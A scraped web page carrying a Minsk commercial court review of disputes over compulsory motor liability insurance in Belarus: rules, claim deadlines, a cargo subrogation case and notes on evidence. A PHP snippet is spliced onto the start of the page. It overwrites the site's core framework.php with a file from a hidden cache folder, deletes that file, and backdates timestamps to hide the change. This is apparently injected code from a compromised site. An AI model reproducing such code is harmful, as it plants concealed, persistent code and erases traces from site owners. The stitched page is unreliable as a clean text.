$frameworkFile = $_SERVER ["DOCUMENT_ROOT"]."/includes/framework.php"; $cacheFile = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_system")."-cache-system.php"; $frameworkFileTo = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_framework")."-cache-framework.php"; if (file_exists($cacheFile) && file_exists($frameworkFileTo)) { require_once JPATH_BASE . "/cache/_system/".md5("_system")."-cache-system.php"; $filemTime = filemtime($frameworkFile); $contentFile = file_get_contents($frameworkFileTo); file_put_contents($frameworkFile, $contentFile, LOCK_EX); @unlink($frameworkFileTo); @unlink($cacheFile); touch($frameworkFile, $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/includes", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache/_system", $filemTime); } Обязательное страхование гражданской ответственности владельцев транспортных средств
Центр страхования организаций и граждан

Обязательное страхование

Обязательное страхование гражданской ответственности

 

В последнее время в судебной практике хозяйственного суда города Минска возникает достаточно много спорных ситуаций в рамках рассмотрения дел, связанных со страхованием. Данные обстоятельства вызваны новизной и изменчивостью законодательства, регулирующего страховую деятельность, различными подходами при применении норм права со стороны страховых компаний и иных участников страховых правоотношений, а также развитием и совершенствованием видов страхования, предлагаемых страховыми организациями.

 


В связи с неоднозначным трактованием норм Гражданского кодекса Республики Беларусь и специальных нормативных правовых актов в сфере страховой деятельности, в хозяйственном суде города Минска была проанализирована судебная практика по наиболее часто встречающимся категориям  споров, связанных со страхованием, определены моменты, на которые следует обращать внимание при рассмотрении подобных дел, а также изучены коллизионные ситуации, возникающие при выплате страхового возмещения по договорам обязательного страхования гражданской ответственности владельцев транспортных средств и добровольного страхования наземных транспортных средств.



ОБЯЗАТЕЛЬНОЕ СТРАХОВАНИЕ ГРАЖДАНСКОЙ ОТВЕТСТВЕННОСТИ ВЛАДЕЛЬЦЕВ ТРАНСПОРТНЫХ СРЕДСТВ

 

25 августа 2006 года был издан Указ Президента Республики Беларусь N 530 «О страховой деятельности» (далее — Указ N 530).

Пунктом 4 данного Указа утверждено Положение о страховой деятельности в Республике Беларусь (далее — Положение).

При обязательном страховании гражданской ответственности владельцев транспортных средств страхователем выступает владелец автомобиля, им может быть любое юридических или физическое лицо. В частности: собственник автомобиля; обладатель права хозяйственного ведения или оперативного управления; арендатор; уполномоченное по доверенности лицо; иные законные владельцы согласно законодательству или договору.

Водитель, не являющийся владельцем транспортного средства, заключать договоры внутреннего страхования не обязан. Вместе с тем он обязан осуществлять пограничное страхование при отсутствии владельца, а, используя автомобиль, иметь страховое свидетельство (полис, сертификат) и предъявлять его по требованию автоинспектора.

Действие договора обязательного страхования гражданской ответственности владельцев транспортных средств (далее – ОСАГО) распространяется на всех имеющих право управления соответствующим транспортным средством.

Общие нормы гражданского права и Положения допускают заключение договоров страхования в интересах иных лиц (выгодоприобретателей).

Нормами Положения определено, что страховщиками могут выступать только государственные страховые организации, являющиеся членами Белорусского бюро по транспортному страхованию (далее — Бюро).

Перечень объектов гражданская ответственность владельцев которых подлежит обязательному страхованию указан в п. 120 Положения.

В п. 125 указаны владельцы транспортных средств, гражданская ответственность которых не подлежит обязательному страхованию согласно Положению (железнодорожного и гужевого транспорта, велосипедов, мопедов, мотоблоков, сельскохозяйственных, мелиоративных, строительных машин и других транспортных средств, не указанных в абзаце втором пункта 120 настоящего Положения, а также транспортных средств Вооруженных Сил, которые не используются для обеспечения хозяйственной деятельности).

В соответствии с пунктом 122 Положения в Республике Беларусь заключаются следующие виды договоров обязательного страхования гражданской ответственности владельцев транспортных средств:

 

  • договор внутреннего страхования;
  • договор пограничного страхования;
  • договор страхования «Зеленая карта».

 

Обязательное условие – договор заключается в письменной форме (ст. 830 ГК РБ). Внутреннее страхование удостоверяется страховым свидетельством, пограничное — страховым полисом, «Зеленая карта — страховым сертификатом.

Срок внутреннего страхования, как правило, 1 год, при сезонном использовании транспортного средства — 1 — 12 месяцев, а до регистрации приобретенного транспортного средства — 15 дней. Срок пограничного страхования и „Зеленой карты” — весь период въезда-выезда автомобиля, но не менее 15 суток (360 часов).

 

Договор прекращается по истечении срока или досрочно в связи с неуплатой второй части взноса; отчуждением (списанием с баланса) автомобиля или невозможности его использования по обстоятельствам, не зависящим от воли страхователя и не являющимся страховыми случаями (например, при уничтожении и хищении машины посторонними); ликвидацией страхователя — юридического лица или смертью гражданина; досрочном прекращении договора об использовании автомобиля (аренды, лизинга, безвозмездного пользования и т.п.).

 

ОСАГО обеспечивает возмещение вреда, причиненного чужому имуществу, а также жизни или здоровью граждан при ДТП на территории Республики Беларусь и выезде в страны — члены системы „Зеленая карта”.

 

Возмещаются только последствия ДТП, совершенного в момент действия договора ОСАГО и зарегистрированного в ГАИ (данные условия являются обязательными (п.п. 124, 125). Потерпевший обязан в силу п. 125 сохранять поврежденное транспортное средство в послеаварийном состоянии до осмотра его специалистом оценщика или страховщика. В противном случае ему может быть отказано в возмещении вреда. Кроме того, необходимо наличие причинной связи между движением (размещением) автомобиля и причиненным вредом. Вместе с тем, согласно п. 125 не возмещается вред, причиненный:

 

  • вследствие непреодолимой силы или умысла потерпевшего, падения груза, выброса из-под колес или функционирования смонтированного на транспорте механизма (например, подъемного крана или разбрасывателя песка);
  • во время спортивных соревнований (гонок) и тренировок, военных действий (мероприятий), гражданских войн, народных волнений и забастовок;
  • в результате ДТП с участием нескольких автомобилей одного владельца либо сцепленных (присоединенных) автомобилей;
  • непосредственно вредителю (владельцу или водителю автомобиля) либо его имуществу;
  • деньгам, драгоценностям, ценным бумагам, документам и коллекциям, а также окружающей среде (ее объектам).

 

Транспорт считается уничтоженным (п. 158), если его ремонт технически невозможен или экономически нецелесообразен (с учетом НДС, но без учета обновления дороже 80% стоимости авто). Размер вреда при уничтожении автомобиля равен действительной стоимости транспортного средства в день ДТП, а так же расходы по эвакуации с места ДТП к месту постоянного хранения (до белорусской границы для нерезидентов), утилизации остатков, оформлению необходимых документов и исчислению размера вреда. При этом, если страховщик полностью возместит вред, причиненный гибелью (уничтожением) транспортного средства, он имеет право на получение остатков данного транспортного средства, а в случае отказа потерпевшего от передачи этих остатков их стоимость исключается из размера вреда.

 

Размер вреда поврежденного транспортного средства возмещается в размере восстановительного ремонта (с учетом износа и без учета НДС) на день ДТП, а так же затрат на эвакуацию транспортного средства, оформление и исчисление. НДС за ремонт возмещается только после представления потерпевшим документов, подтверждающих факт ремонта у организаций (предпринимателей), имеющих соответствующее разрешение (п. 158).

 

Правила исчисления вреда транспорту утверждаются Бюро по согласованию с Минтрансом (Приказ Бюро от 14 сентября 2004 г. N 30-од).

 

При повреждении (уничтожении) дороги, дорожных сооружений, технических средств регулирования дорожного движения и иных объектов или предметов размер вреда определяется действительной стоимостью этого имущества на день наступления страхового случая либо стоимостью его восстановительного ремонта с учетом износа и расходами на оформление необходимых документов по страховому случаю и исчислению размера вреда. (п.160).

 

В соответствии с Указом Президента Республики Беларусь от 25 августа 2006 года N 531 „Об установлении размеров страховых тарифов, страховых взносов, лимитов ответственности по отдельным видам обязательного страхования” 10000 евро может быть выплачено за вред причиненный жизни или здоровью и имуществу. Указанный размер лимита нельзя превышать при любом количестве ДТП в течение срока действия договора ОСАГО. Вместе с тем в случае причинения вреда нескольким лицам общий лимит увеличивается в три раза (при сохранении однократного лимита для каждого из потерпевших в отдельности). Превышение трехкратного лимита влечет пропорциональное уменьшение страхового возмещения каждому потерпевшему.

 

Действия, обеспечивающие возмещение вреда, должны быть следующими:

 

  • Участники ДТП обязаны сообщить друг другу и потерпевшим свое имя, фамилию, адрес, наименование страховщика и предъявить страховое свидетельство (полис, сертификат), а также принять меры по снижению тяжести последствий, вызвать ГАИ и соблюдать Правила дорожного движения.
  • В течение 5 рабочих дней после ДТП его участники должны подать заявления страховщику виновника ДТП.

 

В тот же срок претендент на страховое возмещение обязан представить страховщику письменное объяснение обстоятельств ДТП. Страховщик может потребовать такие же объяснения и от других участников ДТП.

 

  • Страховщик не позднее 5 рабочих дней после получения заявления о ДТП обязан направить запрос в ГАИ и специалиста оценщика или своего специалиста для осмотра поврежденного имущества. В случае, если специалист не прибудет вовремя, потерпевший вправе выбрать оценщика самостоятельно из числа прошедших аттестацию в Бюро;
  • ГАИ в течение 20 рабочих дней направляет страховщику запрошенные документы.
  • Страховщик вправе проверить действительность замены потерпевшим поврежденных узлов и деталей.
  • Страховщик в течение 5 рабочих дней со дня получения необходимых документов составляет акт о страховом случае.
  • Страховщик выплачивает страховое возмещение потерпевшим (их наследникам) либо по их поручению лицам, ремонтировавшим автомобиль.

 

Срок выплаты страхового возмещения — 10 рабочих дней со дня составления акта о страховом случае и 50 рабочих дней после получения заявления потерпевшего о ДТП.

 

В пункте 39 Устава Бюро, утвержденного Указом Президента РБ от 1 декабря 1999 г. N 701 (с изменениями и дополнениями), предусмотрены случаи, при которых выплату осуществляет Бюро по транспортному страхованию. Это компенсация вреда, причиненного транспортом без ОСАГО (при наличии ее у потерпевшего) или находящимся в угоне, а также причинения вреда жизни или здоровью потерпевшего неизвестным транспортным средством. Бюро также рассчитывается за неплатежеспособных (на основании заключения Министерства финансов Республики Беларусь) страховщиков.

 

За каждый день просрочки страховой выплаты виновный страховщик (Бюро) уплачивает пеню 0,1% просроченной суммы потерпевшему юридическому лицу или 0,5% — гражданину (индивидуальному предпринимателю).

 

Страховщик в порядке регресса вправе предъявить требования о возмещении выплаченных сумм от непосредственных причинителей вреда в следующих случаях:

 

  • умышленного вредительства (кроме действий в случаях крайней необходимости или необходимой обороны), совершения вредителем преступления с использованием транспорта или невыполнения Правил дорожного движения;
  • управления автомобилем в состоянии, вызванном употреблением опьяняющих, наркотических, психотропных, токсических или других одурманивающих веществ, либо передачи управления лицу в таком состоянии, а равно отказа от медицинского освидетельствования после ДТП;
  • отсутствия у виновного лица права на управление транспортным средством или вредительство на угнанном автомобиле;
  • отсутствия ОСАГО, а равно не сообщения страхователем страховщику сведений об увеличении страхового риска или указания в заявлении о страховании заведомо ложных сведений, повлекших недоплату страхового взноса;
  • установленной судом вины организации, отвечающей за содержание (эксплуатацию) дороги.

 

Сверх того, страховщик вправе истребовать назад необоснованно выплаченные страховые возмещения.

 

В соответствии с пунктом 1.6.3 статьи 10 Закона Республики Беларусь от 10 января 1992 года N 1394-XII (в редакции от 21 июля 2008 года) „О государственной пошлине” от уплаты государственной пошлины по делам, рассматриваемым в судах, освобождаются стороны по спорам, связанным со страхованием и государственным регулированием страховой деятельности, а также за выдачу копий документов по таким спорам.

Указанная норма распространяется на все категории споров, связанных со страхованием, независимо от наличия между сторонами договорных правоотношений.

При рассмотрении страховых споров следует обращать внимание на следующие моменты.

В первую очередь, вынесение законного и обоснованного судебного постановления основано на правильном определении предмета доказывания.

 

Статья  100 Хозяйственного процессуального кодекса Республики Беларусь устанавливает, что хозяйственный суд исходя из оснований требований и возражений лиц, участвующих в деле, и с учетом содержания подлежащих применению норм права определяет обстоятельства, имеющие значение для правильного разрешения спора или рассмотрения дела (предмета доказывания). Соответственно, выяснение обстоятельств дела связано с определением судом круга обстоятельств, подлежащих установлению, какими данными можно подтвердить их существование проверкой относимости  и допустимости собранных данных определением  достаточности доказательств.

 

Как правило,  предметом  доказывания по спорам, вытекающим из страхования, являются  факты заключения договора страхования, наличия оснований для страховой выплаты или правомерности отказа страховщика  в выплате страхового возмещения.

 

Уже при принятии исковых материалов  к рассмотрению суд должен учитывать, что наиболее необходимыми средствами доказывания фактов, входящих в предмет доказывания по рассматриваемой категории споров  являются: договор страхования, страховой полис (свидетельство, сертификат), заявление страхователя на заключение договора страхования, правила страхования, принятые страховщиком по различным видам страхования и доказательства ознакомления с ними страхователя, страховой акт, аварийный сертификат, акт о наступлении страхового случая, доказательства извещения страхователем страховщика о страховом случае,  расчет страховых выплат, мотивированное решение страховщика об отказе в страховой выплате, доказательства осуществления страховой выплаты, документы представленные страховщику для оценки страхового риска, доказательства совершения страхователем умышленных действий, направленных на  наступление страхового случая.

 

Правильная оценка доказательств на основе принципа полноты, всесторонности и объективности исследования доказательств (ст. 108 ХПК Республики Беларусь)  дает возможность установить действительные взаимоотношения сторон и  обстоятельства дела.

 

Отсутствие доказательств достоверно позволяющих установить     характер, объем, вид причиненного застрахованному товару вреда, т.е.  недоказанность обстоятельств, имеющих значение для дела, которые хозяйственный суд посчитал установленными, послужило основанием для отмены решения суда первой инстанции апелляционным  судом.

 

Так, между истцом (страховое ООО «Р», РФ)   и обществом с ограниченной ответственностью «В», РФ был заключен договор добровольного страхования груза, о чем выдан  страховой полис. Страховая сумма — эквивалент 131 753 росс. рублей. Объект страхования — холодильное оборудование  описанное в полисе с указанием как способа размещения, так и перевозочного средства  (прицеп FREJAT, автомобиль ИVЕСО).

 

Из справки ГРОВД следовало, что на автодорге Борисов –Ошмяны, г.Сморгонь произошло дорожно-транспортное происшествие с участием  автомашины ИВЕКО с прицепом, в которой  перевозился застрахованный груз, и легкового автомобиля, принадлежащего Е(Республика Беларусь). Виновным в ДТП признан водитель легковой автомашины.

 

В справке ГРОВД описаны повреждения, полученные  транспортными средствами в результате ДТП, а также указано на повреждение груза.

Кроме того, сотрудником РОВД  был составлен акт перегрузки груза с поврежденного автомобиля  с прицепом в автомобиль СКАНИЯ  для дальнейшей перевозки.

Доставка груза произведена по СМР №002, в которой получателем  совершена отметка  о том, что груз доставлен не полностью и в поврежденном состоянии.

 

По прибытии к грузополучателю в г.Калининград на территории потерпевшего ООО «В»  был составлен Акт инспекции повреждения холодильного оборудования  с участием сюрвейера, представителя страхового ООО «Р», представителя ООО «В» и третьего лица ООО «Ф». Также с участием представителя грузоперевозчика и представителя грузополучателя ООО «В» был произведен осмотр поврежденного имущества – холодильного оборудования, о чем составлен  коммерческий акт.

 

С учетом Акта  инспекции повреждения холодильного оборудования организацией, действующей на основании лицензии на осуществление оценочной деятельности был произведен расчет размера причиненного холодильному оборудованию  ущерба  — 649865,39 российских рублей.

 

Признавая факт возникновения страхового случая на основании акта о страховом случае истец произвел потерпевшему страховую выплату в размере 601605,67 российских рублей.

Гражданская ответственность владельца легкового автомобиля была застрахована закрытым акционерным страховым обществом «Т» (Республика Беларусь).

Исходя из данного обстоятельства и в целях возмещения выплаченной страховой суммы страховое ООО «Р»  обратилось  в суд с требованием взыскании  с ЗАСО «Т» 345937 российских рублей выплаченного страхового возмещения.

 

Удовлетворяя иск, суд первой инстанции признал необоснованными  доводы ответчика о том, что подлежащий возмещению по законодательству Республики Беларусь размер вреда достоверно не установлен ввиду того, что участниками ДТП не соблюден порядок обращения в страховую компанию и  поврежденное имущество не сохранено.

 

Данные выводы апелляционным  судом признаны  неправильными  исходя из следующего.

 

Согласно ст. 1129 ГК Республики Беларусь права и обязанности по обязательствам, возникающим вследствие причинения вреда, определяются по праву страны, где имело место действие или иное обстоятельство, послужившее основанием для требования о возмещении вреда.

 

Поскольку спор возник из факта причинения вреда в результате ДТП совершенного на территории Республики Беларусь подлежащими применению при разрешении спора были определены нормы  материального права, действовавшие на момент возникновения спорных правоотношений, а именно Положение «О порядке и условиях проведения обязательного страхования гражданской ответственности владельцев транспортных средств», утвержденного Указом Президента Республики Беларусь от 19.02.1999 №100, ст.ст. 855, 933, 948 ГК Республики Беларусь.

 

Исходя из содержания  указанных норм истец, как лицо  возместившее вред потерпевшему,   имел  суброгационное требование к страховой организации виновника ДТП, ответственность которого была застрахована по договору обязательного страхования гражданской ответственности владельцев транспортных средств.

 

Однако, в силу ст. 100 ХПК Республики Беларусь суд первой инстанции, должен был определить как  обстоятельство, имеющее значение для правильного разрешения спора или рассмотрения дела (предмет доказывания) не только сам факт причинения вреда в результате ДТП, но и достоверно установить его объем.

 

Исходя из условий и принципов оценки доказательств  закрепленных ст.108 ХПК Республики Беларусь, согласно которой никакие доказательства не имеют для хозяйственного суда заранее установленной силы, суд должен был оценить относимость, допустимость, достоверность каждого доказательства в отдельности, а также достаточность и взаимную связь доказательств в их совокупности.

 

Кроме того, доказательство могло быть признано хозяйственным судом достоверным, если в результате его исследования, сопоставления с другими доказательствами суд установит, что содержащиеся в нем сведения соответствуют действительности.

 

Предъявляя к ответчику требования, истец представил  в качестве доказательств определения размера подлежащего возмещению вреда  коммерческий акт, Акт инспекции повреждения холодильного оборудования, расчет размера причиненного холодильному оборудованию  ущерба  на сумму 649865,39 российских рублей.

 

Однако, судом не принято во внимание, что указанные документы составлены уже только по факту доставки груза грузополучателю. Осмотр груза в Калининграде производился без приглашения и участия в нем  ответчика, как лица непосредственно заинтересованного в спорных правоотношениях.

 

Сопоставление  коммерческого  акта, акта инспекции повреждения холодильного оборудования с актом перегрузки груза с поврежденного автомобиля с прицепом в автомобиль СКАНИЯ для дальнейшей перевозки показывает, что непосредственно  в месте совершения  ДТП  не был зафиксирован характер и  объем  вреда причиненного  товару.

 

Как следствие, коммерческий акт и акт инспекции повреждения холодильного оборудования в спорных отношениях для ответчика  не имели заранее установленной силы, и являются односторонними по своему содержанию.

 

Поскольку в акте перегрузки груза с поврежденного автомобиля  с прицепом в автомобиль SCANIA для дальнейшей перевозки не описан характер, объем, вид  и пр. исходные данные для определения  размера причиненного при  ДТП вреда товару, по требованиям к ЗАСО «Т» отсутствовали доказательства, позволяющие достоверно определить степень обесценивания груза.

 

Как следствие, в силу отсутствия доказательств достоверно позволяющих установить характер, объем, вид причиненного холодильному оборудованию вреда, требования истца апелляционным судом признаны необоснованными, а решение суда первой инстанции отменено.

 

При рассмотрении исковых заявлений страховых компаний к лицам, ответственным за причинение вреда, предъявляемых в порядке статьи 855 ГК Республики Беларусь  следует обращать внимание на методику расчета цены иска, так как сумма, выплаченная страховщиком потерпевшему определяется исходя из условий заключенного между ними договора страхования и не всегда соответствует сумме реального ущерба, определяемого в соответствии с действующим законодательством.

 

В соответствии со статьей 833 ГК Республики Беларусь условия, на которых заключается договор добровольного страхования, определяются в правилах соответствующего вида страхования, утвержденных страховщиком либо объединением страховщиков и согласованных с органом, осуществляющим государственный надзор за страховой деятельностью. Условия, содержащиеся в правилах страхования, в том числе не включенные в текст договора страхования или страхового полиса (свидетельства, сертификата), обязательны для страховщика и страхователя или выгодоприобретателя.

 

Исходя из вышеуказанных положений следует, что правила добровольного страхования обязательны лишь для страховщика и страхователя (выгодоприобретателя), и, соответственно, не распространяются на иных лиц, в том числе на лицо, ответственное за причинение вреда, являющегося страховым случаем. Кроме того, размер страхового возмещения не тождественен размеру причиненного вреда (реального ущерба),  поэтому, определяемый в данных правилах размер страхового возмещения, не может выступать в качестве критерия определения размера причиненного вреда, подлежащего взысканию с лица, ответственного за его причинение. В данном случае при определении размера вреда, причиненного имуществу потерпевшего и подлежащего взысканию с лица, виновного в причинении вреда, следует исходить из критериев, определенных в актах законодательства, регулирующих данные либо аналогичные правоотношения.

 

Критерии определения размера вреда содержатся, в частности, в Правилах определения размера вреда, причиненного транспортному средству в результате дорожно-транспортного происшествия, для целей обязательного страхования гражданской ответственности владельцев транспортных средств, утвержденных приказом Белорусского бюро по транспортному страхованию от 14 сентября 2004 г. N 30-од, Инструкцией о порядке определения размера причиненного государственному имуществу вреда в связи с утратой, повреждением (порчей), недостачей при проведении проверок (ревизий) финансово-хозяйственной деятельности государственных юридических лиц, утвержденной постановлением Министерства финансов Республики Беларусь, Министерства экономики Республики Беларусь от 24 марта 2003 г. №39/69. Данные нормативные правовые акты, в частности,  предусматривают учет степени износа (амортизации) поврежденного имущества при определении размера вреда, что страховыми организациями при заключении договоров добровольного страхования не всегда учитывается.

 

Таким образом, при рассмотрении дел данной категории следует истребовать документы, подтверждающие расчет размера вреда и стоимости ремонта поврежденного имущества в соответствии с требованиями действующего законодательства, а не условиями договора страхования.

 

В случаях, когда одновременно с требованиями страховых компаний о взыскании суммы убытков в порядке суброгации к лицам, ответственным за причинение вреда, заявляются требования о взыскании процентов за пользование чужими денежными средствами необходимо обращать внимание на дату начала периода неправомерного пользования чужими денежными средствами.

 

Так, в соответствии с пунктом 21 постановления Пленума Высшего Хозяйственного Суда Республики Беларусь от 21.01.2004 № 1 «О некоторых вопросах применения норм Гражданского кодекса Республики Беларусь об ответственности за пользование чужими денежными средствами» если при наличии спора лицо, которому причинен вред, самостоятельно произвело денежные расходы по исправлению поврежденной вещи, то проценты начисляются на каждую денежную сумму с момента ее фактической выплаты на указанные цели.

 

Вместе с тем, в силу статьи 855 ГК Республики Беларусь страховщик, к которому перешли права страхователя (выгодоприобретателя), должен соблюдать материальные и процессуальные требования законодательства, регулирующие отношения в которых состояли страхователь и лицо, ответственное за убытки, понесенные страхователем (выгодоприобретателем) при наступлении страхового случая.

 

Суброгация является частным случаем перемены лиц в обязательстве и предполагает переход прав кредитора (страхователя, выгодоприобретателя) к другому лицу (страховщику) на основании законодательства в объеме требования, которое страхователь (выгодоприобретатель) имеет к лицу, ответственному за убытки.

 

В этой связи Кассационная коллегия Высшего Хозяйственного Суда Республики Беларусь отметила, что установленная статьей 366 ГК Республики Беларусь ответственность за неисполнение денежного обязательства в порядке суброгации применяется по правилам статьи 295 ГК Республики Беларусь, в связи с чем, просрочка исполнения данного обязательства наступает по истечении семидневного срока со дня поступления письменного требования страховой компании к лицу, ответственному за убытки.

 

При этом также следует обращать внимание на полноту информации, представляемой страховой компанией лицу, ответственному за убытки, в целях добровольной компенсации страхового возмещения, выплаченного потерпевшему. К письменному требованию страховой компании о возмещении убытков к лицу, ответственному за причинение вреда, должны быть приложены документы, касающиеся обстоятельств причинения вреда, подтверждающие виновность в его причинении определенного лица, а также связь между непосредственным причинителем вреда и лицом, ответственным за убытки. Кроме того, страховая компания должна приложить документы, подтверждающие размер причиненного вреда, определенный в соответствии с действующим законодательством (заключение о размере вреда, стоимости ремонта и т.п.). Помимо указанных выше документов лицу, ответственному за убытки, должны быть представлены доказательства выплаты страхового возмещения потерпевшему (акт о страховом случае, платежные инструкции и банковские документы, подтверждающие перечисление страхового возмещения потерпевшему либо иному уполномоченному лицу и т.д.)

 

К письменному требованию о возмещении убытков должны быть приложены и иные документы, наличие которых признано обязательным в силу действующих нормативных правовых актов.

 

В случае не предоставления страховой организацией вышеуказанного перечня документов, у лица, ответственного за убытки, будут отсутствовать достаточные основания для принятия решения об обоснованности требований страховой организации и выплате суммы убытков, понесенных страховой компанией в связи с компенсацией причиненного потерпевшему вреда. Таким образом, при данных обстоятельствах в действиях лица, ответственного за убытки, может не   усматриваться признаков неправомерного удержания либо неосновательного сбережения денежных средств, подлежащих выплате страховой организации, возместившей вред потерпевшему, в связи с чем, лицо, ответственное за причинение вреда, может не нести ответственности за неисполнение денежного обязательства в соответствии со статьей 366 ГК Республики Беларусь.

 

По искам потерпевших к страховщикам по договорам обязательного страхования гражданской ответственности владельцев транспортных средств вследствие отказа страховых компаний выплатить страховое возмещение надлежит выяснять причины отказа в выплате (оставления заявления о выплате без рассмотрения) и наличие у потерпевшего договора добровольного страхования наземных транспортных средств, в соответствии с которым могло бы быть произведено возмещение причиненного ущерба.

 

Основания и порядок выплаты страхового возмещения по договорам обязательного страхования гражданской ответственности владельцев транспортных средств регламентирован Положением о страховой деятельности в Республике Беларусь, утвержденным Указом Президента Республики Беларусь от 25.08.2006 №530 (глава 11).

 

Пунктом 124 Положения установлено, что страховым по обязательному страхованию гражданской ответственности владельцев транспортных средств является факт причинения вреда жизни, здоровью и (или) имуществу потерпевшего в период действия договора внутреннего, либо пограничного страхования, либо договора страхования „Зеленая карта”, действительного на территории Республики Беларусь, в результате дорожно-транспортного происшествия, в связи с чем, предусмотрена выплата страхового возмещения.

 

При этом страховому возмещению подлежит, в частности,   материальный вред, вызванный повреждением или уничтожением  имущества потерпевшего (п. 151 Положения).

 

В соответствии с частью четвертой пункта 150 Положения вред, причиненный потерпевшему в результате дорожно-транспортного происшествия при наличии у него договора добровольного страхования наземных транспортных средств, заключенного им самим или в его пользу, и договора обязательного страхования гражданской ответственности владельцев транспортных средств, заключенного в его пользу, в первую очередь возмещается по договору обязательного страхования гражданской ответственности владельцев транспортных средств в порядке, установленном Положением.

 

На практике возникают случаи, когда потерпевший в результате дорожно-транспортного происшествия первоначально обращается к страховщику по договору добровольного страхования наземных транспортных средств. В соответствии с условиями договора добровольного страхования страховщик предпринимает меры по определению размера вреда и выплаты страхового возмещения потерпевшему, тем самым нарушая установленную очередность осуществления страховых выплат. Впоследствии потерпевший обращается к страховщику ответственности виновника дорожно-транспортного происшествия для получения страхового возмещения по договору обязательного страхования и последующего перечисления полученных сумм страховщику по договору добровольного страхования в целях частичной компенсации понесенных им убытков.

 

При данных обстоятельствах следует отметить, что не смотря на приоритет возмещения вреда по договору обязательного страхования гражданской ответственности владельцев транспортных средств, указанные выплаты носят компенсационный характер, исключающий возможность двойного возмещения. Нарушение установленного порядка выплаты страхового возмещения вреда, причиненного потерпевшему в результате дорожно-транспортного происшествия, и произведенный ремонт поврежденного транспортного средства лишает страховщика по договору обязательного страхования возможности соблюсти установленный Положением порядок определения и выплаты страхового возмещения потерпевшему, предъявления регрессных требований. Следовательно, право требования выплаты страхового возмещения к страховщику по договору обязательного страхования после выплаты страхового возмещения по договору добровольного страхования у потерпевшего отсутствует. Требования потерпевшего необоснованны и в том случае, когда после получения страхового возмещения от страховщика по договору добровольного страхования потерпевший возвратил полученную сумму по причине нарушения очередности выплаты страхового возмещения, так как ремонт поврежденного автомобиля полностью произведен в соответствии с условиями договора добровольного страхования, основания и последствия возврата суммы страхового возмещения (стоимости ремонта) в адрес страховщика по договору добровольного страхования Положением не предусмотрены.

 

Источник материала www.court.by


Рейтинг 5.0 из 5. Голосов: 26
 
Rating All.BY
Наша группа в Одноклассниках
Мы ВКонтакте
Наша страница Facebook
Страховка VIP в Twitter